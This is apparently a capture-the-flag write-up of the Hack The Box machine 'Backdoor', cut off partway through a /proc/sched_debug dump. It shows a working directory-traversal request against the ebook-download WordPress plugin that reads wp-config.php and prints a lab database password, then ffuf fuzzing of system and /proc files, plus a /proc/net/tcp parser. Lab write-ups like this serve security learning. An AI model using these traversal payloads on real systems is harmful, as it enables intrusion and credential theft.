
Hack The Box - Backdoor

 •  ✍️ sckull

Backdoor runs WordPress with a vulnerable plugin that let us read information about the running processes; we found a gdb server listening, through which we gained access as a first user. After attaching to a screen session we obtained root access.

Name: Backdoor
OS: Linux
Points: 20
Difficulty: Easy
IP: 10.10.11.125
Maker: hkabubaker17

Matrix (radar chart): User Rate: Enumeration 5.7, Real-Life 4.3, CVE 4.7, Custom Exploitation 5.3, CTF-Like 5.7. Maker Rate: 0 in every category.

Recon

nmap

nmap shows several open ports: SSH (22), HTTP (80) and an unidentified service on 1337 (reported as waste?).

# Nmap 7.91 scan initiated Sat Nov 20 21:17:54 2021 as: nmap -p22,80,1337 -sC -sV -o nmap backdoor.htb
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.085s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 20 21:18:17 2021 -- 1 IP address (1 host up) scanned in 22.78 seconds

Web Site

A curl request shows, in the response headers, several Link headers that belong to WordPress.

 π ~/htb/backdoor ❯ curl -sI 10.10.11.125
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 03:57:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Link: <http://10.10.11.125/index.php/wp-json/>; rel="https://api.w.org/"
Link: <http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate"; type="application/json"
Link: <http://10.10.11.125/>; rel=shortlink
Content-Type: text/html; charset=UTF-8

 π ~/htb/backdoor ❯

Visiting the page confirms it is indeed a WordPress site, and it shows no further information.
image

WordPress

We enumerated plugins with the default detection option, which initially found nothing, so we switched to mixed detection; even so it only shows the akismet plugin, version 4.2.1. Also, the WordPress version (5.8.1) does not appear to be vulnerable.

 π ~/htb/backdoor ❯ wpscan --url http://10.10.11.125/ -e p --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sun Nov 28 03:39:14 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:26 <==========================================================================================================> (1499 / 1499) 100.00% Time: 00:00:26
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.11.125/wp-content/plugins/akismet/
 | Latest Version: 4.2.1
 | Last Updated: 2021-10-01T18:28:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 28 03:39:43 2021
[+] Requests Done: 1505
[+] Cached Requests: 36
[+] Data Sent: 412.582 KB
[+] Data Received: 269.619 KB
[+] Memory used: 260 MB
[+] Elapsed time: 00:00:29
 π ~/htb/backdoor ❯

Directory Traversal

The akismet plugin does not appear to have any vulnerability; however, the plugins directory listing shows ebook-download.
image

If we open its readme.txt we see that it allows file downloads. Researching this plugin a bit, we found that it allows access to any directory on the machine. A curl request returns the wp-config.php file, where we see the credentials of the WordPress database.

 π ~/htb/backdoor  curl -s "10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"|grep -v "*"
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php

define( 'DB_NAME', 'wordpress' );

define( 'DB_USER', 'wordpressuser' );

define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

define( 'DB_HOST', 'localhost' );

define( 'DB_CHARSET', 'utf8' );

define( 'DB_COLLATE', '' );


if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');

define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );


$table_prefix = 'wp_';

define( 'WP_DEBUG', false );





if ( ! defined( 'ABSPATH' ) ) {
   define( 'ABSPATH', __DIR__ . '/' );
}

require_once ABSPATH . 'wp-settings.php';
<script>window.close()</script>
 π ~/htb/backdoor 

Knowing that we can read any file on the machine, we use a wordlist to enumerate files containing sensitive information.

 π ~/htb/backdoor ❯ ffuf -c -w LFI_paths.txt -u "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ
 :: Wordlist         : FUZZ: LFI_paths.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 1
________________________________________________

/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 1072, Words: 115, Lines: 25]
/etc/apache2/mods-available/ssl.conf [Status: 200, Size: 3339, Words: 431, Lines: 86]
/etc/apache2/ports.conf [Status: 200, Size: 510, Words: 36, Lines: 16]
/etc/apache2/mods-available/setenvif.conf [Status: 200, Size: 1524, Words: 113, Lines: 33]
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 981, Words: 82, Lines: 30]
/etc/apache2/mods-available/proxy.conf [Status: 200, Size: 1057, Words: 124, Lines: 28]
/etc/apache2/mods-available/mime.conf [Status: 200, Size: 7908, Words: 943, Lines: 252]
/etc/bash.bashrc        [Status: 200, Size: 2488, Words: 399, Lines: 72]
/etc/ca-certificates.conf [Status: 200, Size: 6766, Words: 64, Lines: 161]
/etc/ca-certificates.conf.dpkg-old [Status: 200, Size: 6792, Words: 64, Lines: 161]
/etc/apache2/mods-available/dir.conf [Status: 200, Size: 386, Words: 15, Lines: 6]
/etc/crontab            [Status: 200, Size: 1199, Words: 181, Lines: 23]
/etc/crypttab           [Status: 200, Size: 214, Words: 5, Lines: 2]
[.. snip ..]
/proc/cpuinfo           [Status: 200, Size: 2354, Words: 271, Lines: 57]
/proc/devices           [Status: 200, Size: 711, Words: 97, Lines: 61]
/proc/meminfo           [Status: 200, Size: 1635, Words: 515, Lines: 54]
/proc/net/tcp           [Status: 200, Size: 1210, Words: 369, Lines: 8]
/proc/net/udp           [Status: 200, Size: 544, Words: 101, Lines: 4]
/proc/self/stat         [Status: 200, Size: 483, Words: 52, Lines: 2]
/proc/self/mounts       [Status: 200, Size: 2841, Words: 181, Lines: 37]
/proc/self/status       [Status: 200, Size: 1524, Words: 93, Lines: 56]
/proc/version           [Status: 200, Size: 310, Words: 17, Lines: 2]
/usr/share/adduser/adduser.conf [Status: 200, Size: 3242, Words: 402, Lines: 89]
/var/www/html/wp-config.php [Status: 200, Size: 3971, Words: 484, Lines: 113]
:: Progress: [1014/1014] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
 π ~/htb/backdoor ❯

User

Proc - Enumeration

The configuration files did not reveal much, but we can see /proc; researching these files, specifically net/tcp, we find that its contents can be decoded to see which ports are listening locally. Using a perl script we see that port 1337 exists; this port shows no information when we connect with netcat, yet nmap still reports it as open.

 π ~/htb/backdoor ❯ cat tcp_proc
   sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 31157 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 32750 1 0000000000000000 100 0 0 10 0
   2: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 35407 1 0000000000000000 100 0 0 10 0
   3: 0100007F:8124 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36357 1 0000000000000000 100 0 0 10 0
   4: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36359 1 0000000000000000 100 0 0 10 0
   5: 7D0B0A0A:D15E 01010101:0035 02 00000001:00000000 01:00000000 00000002   101        0 41859 2 0000000000000000 400 0 0 1 7
 π ~/htb/backdoor ❯ cat tcp_proc| cut -d ' ' -f5| tr ':' ' ' | tail --lines +2 > local_address
 π ~/htb/backdoor ❯ while read line; do echo "./proc_net.pl $line"|bash; done < local_address
hex: 3500007F
IP: 127.0.0.53  PORT: 53
hex: 00000000
IP: 0.0.0.0  PORT: 22
hex: 00000000
IP: 0.0.0.0  PORT: 1337
hex: 0100007F
IP: 127.0.0.1  PORT: 33060
hex: 0100007F
IP: 127.0.0.1  PORT: 3306
hex: 7D0B0A0A
IP: 10.10.11.125  PORT: 53598
 π ~/htb/backdoor ❯
  π ~/htb/backdoor ❯ nc 10.10.11.125 1337 -vvv
backdoor.htb [10.10.11.125] 1337 (?) open
^C sent 0, rcvd 0
 π ~/htb/backdoor ❯ nmap -p 1337 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 04:24 UTC
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.075s latency).

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
 π ~/htb/backdoor ❯
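The perl script itself is not shown on the page. As an added example of the same decoding (not the author's script), here is a Python parser for /proc/net/tcp that turns the little-endian hex fields into addresses, ports and TCP states and lists the LISTEN sockets with their owning uid, which is what makes port 1337 stand out as the only listener owned by uid 1000. It goes a little beyond the page by also handling the /proc/net/tcp6 layout; the sample input is the listing captured above.

```python
import socket
import struct

# Sample input: the /proc/net/tcp listing retrieved on this page (one header line
# plus six socket entries).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 31157 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 32750 1 0000000000000000 100 0 0 10 0
   2: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 35407 1 0000000000000000 100 0 0 10 0
   3: 0100007F:8124 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36357 1 0000000000000000 100 0 0 10 0
   4: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   113        0 36359 1 0000000000000000 100 0 0 10 0
   5: 7D0B0A0A:D15E 01010101:0035 02 00000001:00000000 01:00000000 00000002   101        0 41859 2 0000000000000000 400 0 0 1 7
"""

# TCP socket states as numbered in the Linux kernel (include/net/tcp_states.h).
TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING", 0x0C: "NEW_SYN_RECV",
}


def decode_endpoint(field):
    """Decode an 'ADDR:PORT' field. The kernel prints each 32-bit address word
    in host byte order (little-endian on x86), so every 8-hex-char word is
    byte-swapped back. IPv4 is one word; IPv6 (/proc/net/tcp6) is four."""
    addr_hex, port_hex = field.split(":")
    words = [int(addr_hex[i:i + 8], 16) for i in range(0, len(addr_hex), 8)]
    raw = b"".join(struct.pack("<I", w) for w in words)
    family = socket.AF_INET if len(raw) == 4 else socket.AF_INET6
    return socket.inet_ntop(family, raw), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the text of /proc/net/tcp or /proc/net/tcp6 into a list of dicts."""
    entries = []
    for line in text.splitlines()[1:]:          # skip the column header
        parts = line.split()
        if len(parts) < 10:
            continue
        local_ip, local_port = decode_endpoint(parts[1])
        remote_ip, remote_port = decode_endpoint(parts[2])
        state_code = int(parts[3], 16)
        entries.append({
            "local_ip": local_ip, "local_port": local_port,
            "remote_ip": remote_ip, "remote_port": remote_port,
            "state": TCP_STATES.get(state_code, f"UNKNOWN({state_code:#04x})"),
            "uid": int(parts[7]), "inode": int(parts[9]),
        })
    return entries


def listening_sockets(text):
    """Return only LISTEN entries: the ports an operator should be able to account
    for. The uid column says which account owns each listener."""
    return [e for e in parse_proc_net_tcp(text) if e["state"] == "LISTEN"]


if __name__ == "__main__":
    for e in listening_sockets(SAMPLE_PROC_NET_TCP):
        print(f"{e['local_ip']}:{e['local_port']:<6} uid={e['uid']}")
```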

Researching Directory Traversal a bit further, we found a post explaining that it is possible to gather information by reading the /proc files, which can hold a great deal of information about running processes, variables, directories, configuration, etc. We first fetched /proc/sched_debug, which listed every process together with its PID (the excerpt below is followed by the full output); some are interesting, such as cron, sh, sleep and true.

          task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       519.671425      3021   120         0.000000      1440.110160         0.000000 0 0 /autogroup-2
 S       kthreadd     2     19854.750146       289   120         0.000000         3.772400         0.000000 0 0 /
[.. snip ..]
 S  rs:main Q:Reg   843        65.688422      2311   120         0.000000        82.416140         0.000000 0 0 /autogroup-44
 S systemd-logind   772        51.786524       353   120         0.000000        57.482730         0.000000 0 0 /autogroup-43
 S           cron   795        23.500787        86   120         0.000000         9.187460         0.000000 0 0 /autogroup-53
 S           cron   797         4.951889        22   120         0.000000         2.347230         0.000000 0 0 /autogroup-53
 S           cron   798         4.063958        28   120         0.000000         1.866590         0.000000 0 0 /autogroup-53
 S             sh   822         6.096762         3   120         0.000000         0.875700         0.000000 0 0 /autogroup-63
 S            atd   831         0.698262         5   120         0.000000         1.947490         0.000000 0 0 /autogroup-65
 S        apache2   919       503.996756      4080   120         0.000000       204.206630         0.000000 0 0 /autogroup-78
 S        polkitd   952         0.967613        45   120         0.000000         6.252250         0.000000 0 0 /autogroup-79
 S          gmain   957         0.219552         2   120         0.000000         0.054380         0.000000 0 0 /autogroup-79
 S          gdbus   959         2.391570        30   120         0.000000         2.256970         0.000000 0 0 /autogroup-79
 S         mysqld   982      1454.947024       201   120         0.000000       950.670570         0.000000 0 0 /autogroup-82
 S     ib_io_wr-1   999      2132.449254      8058   120         0.000000       147.278470         0.000000 0 0 /autogroup-82
 S     ib_io_wr-2  1000      2132.434954      8073   120         0.000000       100.577020         0.000000 0 0 /autogroup-82
 S ib_pg_flush_co  1003      2132.461204      4153   120         0.000000       146.851890         0.000000 0 0 /autogroup-82
 Sib_log_fl_notif  1005      2138.469534     40602   120         0.000000       761.835450         0.000000 0 0 /autogroup-82
 S   ib_log_flush  1006      2132.462634     40721   120         0.000000       525.424850         0.000000 0 0 /autogroup-82
 Sib_log_wr_notif  1007      2132.459704     40597   120         0.000000       698.855610         0.000000 0 0 /autogroup-82
 S  ib_log_writer  1008      2132.484224     40629   120         0.000000       531.424940         0.000000 0 0 /autogroup-82
 S ib_srv_lock_to  1029      2132.404864      4002   120         0.000000        85.624910         0.000000 0 0 /autogroup-82
 S ib_srv_err_mon  1030      2132.395744      4001   120         0.000000        79.468610         0.000000 0 0 /autogroup-82
 S    ib_src_main  1033      2132.532934      4003   120         0.000000       268.500730         0.000000 0 0 /autogroup-82
 S  ib_dict_stats  1034      2132.340934       401   120         0.000000        11.093740         0.000000 0 0 /autogroup-82
 S     ib_fts_opt  1035      2132.366374       802   120         0.000000        22.894900         0.000000 0 0 /autogroup-82
 S   xpl_worker-1  1038      2122.324314        67   120         0.000000         1.556280         0.000000 0 0 /autogroup-82
 S   xpl_worker-2  1039      2122.327704        67   120         0.000000         0.984690         0.000000 0 0 /autogroup-82
 S   xpl_accept-1  1040      1256.510815         3   120         0.000000         0.024590         0.000000 0 0 /autogroup-82
 S    ib_buf_dump  1044      1224.615357         4   120         0.000000         0.996910         0.000000 0 0 /autogroup-82
 S  ib_clone_gtid  1045      2132.469694     40000   120         0.000000       698.268460         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-3  1049      1473.419354       381   120         0.000000        16.402710         0.000000 0 0 /autogroup-82
 S      evt_sched  1050      1258.486107         1   120         0.000000         0.555790         0.000000 0 0 /autogroup-82
 S    sig_handler  1051      1272.678439         4   120         0.000000         0.045260         0.000000 0 0 /autogroup-82
 S   xpl_accept-2  1052      2132.400884      4487   120         0.000000       140.123980         0.000000 0 0 /autogroup-82
 S       gtid_zip  1054      1272.680619         2   120         0.000000         0.173790         0.000000 0 0 /autogroup-82
 S     connection  2745      1456.449824       263   120         0.000000        77.094580         0.000000 0 0 /autogroup-82
 S     connection  2746      1466.696594       424   120         0.000000        67.397070         0.000000 0 0 /autogroup-82
 I kworker/u256:1  3732     20371.992915      8245   120         0.000000       177.224550         0.000000 0 0 /
 S        apache2  4991       487.566296        35   120         0.000000        14.617150         0.000000 0 0 /autogroup-78
 S        apache2  5001       495.637356        29   120         0.000000        13.318640         0.000000 0 0 /autogroup-78
 S        apache2  5002       493.276976        30   120         0.000000        11.690060         0.000000 0 0 /autogroup-78
 S        apache2  5006       493.332166        28   120         0.000000         8.924860         0.000000 0 0 /autogroup-78
 S        apache2  5015       487.958556        25   120         0.000000        10.375860         0.000000 0 0 /autogroup-78
 S        apache2  5027       487.279166        25   120         0.000000         7.637470         0.000000 0 0 /autogroup-78
 I    kworker/1:2  9006     20397.858690      7396   120         0.000000       488.829440         0.000000 0 0 /
 I kworker/u256:0  9394     20397.344230      1827   120         0.000000        35.668860         0.000000 0 0 /
 t           true  9964        11.181754         5   120         0.000000         0.892650         0.000000 0 0 /autogroup-97
 I    kworker/1:1  9970     19866.729543         2   120         0.000000         0.002290         0.000000 0 0 /
 S          sleep 11031     31681.982737         1   120         0.000000         0.917290         0.000000 0 0 /autogroup-56
 π ~/htb/backdoor ❯ curl -s "10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../..//proc/sched_debug"
../../../../../../..//proc/sched_debug../../../../../../..//proc/sched_debug../../../../../../..//proc/sched_debugSched Debug Version: v0.11, 5.4.0-80-generic #90-Ubuntu
ktime                                   : 3887966.407279
sched_clk                               : 3888584.275900
cpu_clk                                 : 3888056.881740
jiffies                                 : 4295864257
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 2059067
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2000.000 MHz
  .nr_running                    : 0
  .nr_switches                   : 557787
  .nr_load_updates               : 0
  .nr_uninterruptible            : 2
  .next_balance                  : 4295.864258
  .curr->pid                     : 0
  .clock                         : 3888055.451240
  .clock_task                    : 3888055.451240
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/autogroup-82
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 775.934870
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14923.580373
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887928.649480
  .se->vruntime                  : 15693.626750
  .se->sum_exec_runtime          : 2563.378530
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-78
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 761.651623
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14937.863620
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887655.471120
  .se->vruntime                  : 15693.532393
  .se->sum_exec_runtime          : 1016.615180
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-36
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 1046.948344
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -14652.566899
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3887803.723600
  .se->vruntime                  : 15693.548413
  .se->sum_exec_runtime          : 1015.887610
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 15699.515243
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 1
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.033390
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 I         rcu_gp     3        13.968173         2   100         0.000000         0.003890         0.000000 0 0 /
 I     rcu_par_gp     4        15.968234         2   100         0.000000         0.002150         0.000000 0 0 /
 I   kworker/0:0H     6      2934.228300         4   100         0.000000         0.022430         0.000000 0 0 /
 I   mm_percpu_wq     9        22.038051         2   100         0.000000         0.000710         0.000000 0 0 /
 S    ksoftirqd/0    10     15693.524383       799   120         0.000000        29.860830         0.000000 0 0 /
 I      rcu_sched    11     15693.777743     91101   120         0.000000       961.631970         0.000000 0 0 /
 S    migration/0    12        28.038048      1112     0         0.000000        15.792810         0.000000 0 0 /
 S  idle_inject/0    13         0.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 S        cpuhp/0    14      7094.775365         9   120         0.000000         0.061800         0.000000 0 0 /
 I blkcg_punt_bio    80        56.716856         2   100         0.000000         0.004470         0.000000 0 0 /
 S      watchdogd    87         0.000000         2     0         0.000000         0.002610         0.000000 0 0 /
 Secryptfs-kthrea    91       666.202515         2   120         0.000000         0.002420         0.000000 0 0 /
 S  irq/24-pciehp    94         0.000000         2    49         0.000000         0.004730         0.000000 0 0 /
 S  irq/26-pciehp    96         0.000000         2    49         0.000000         0.003460         0.000000 0 0 /
 S  irq/28-pciehp    98         0.000000         2    49         0.000000         0.003600         0.000000 0 0 /
 S  irq/30-pciehp   100         0.000000         2    49         0.000000         0.005110         0.000000 0 0 /
 S  irq/32-pciehp   102         0.000000         2    49         0.000000         0.003470         0.000000 0 0 /
 S  irq/34-pciehp   104         0.000000         2    49         0.000000         0.003370         0.000000 0 0 /
 S  irq/36-pciehp   106         0.000000         2    49         0.000000         0.003380         0.000000 0 0 /
 S  irq/38-pciehp   108         0.000000         2    49         0.000000         0.003410         0.000000 0 0 /
 S  irq/40-pciehp   110         0.000000         2    49         0.000000         0.003440         0.000000 0 0 /
 S  irq/42-pciehp   112         0.000000         2    49         0.000000         0.003390         0.000000 0 0 /
 S  irq/44-pciehp   114         0.000000         2    49         0.000000         0.004310         0.000000 0 0 /
 S  irq/46-pciehp   116         0.000000         2    49         0.000000         0.003310         0.000000 0 0 /
 S  irq/48-pciehp   118         0.000000         2    49         0.000000         0.003810         0.000000 0 0 /
 S  irq/50-pciehp   120         0.000000         2    49         0.000000         0.003330         0.000000 0 0 /
 S  irq/52-pciehp   122         0.000000         2    49         0.000000         0.003260         0.000000 0 0 /
 S  irq/54-pciehp   124         0.000000         2    49         0.000000         0.003390         0.000000 0 0 /
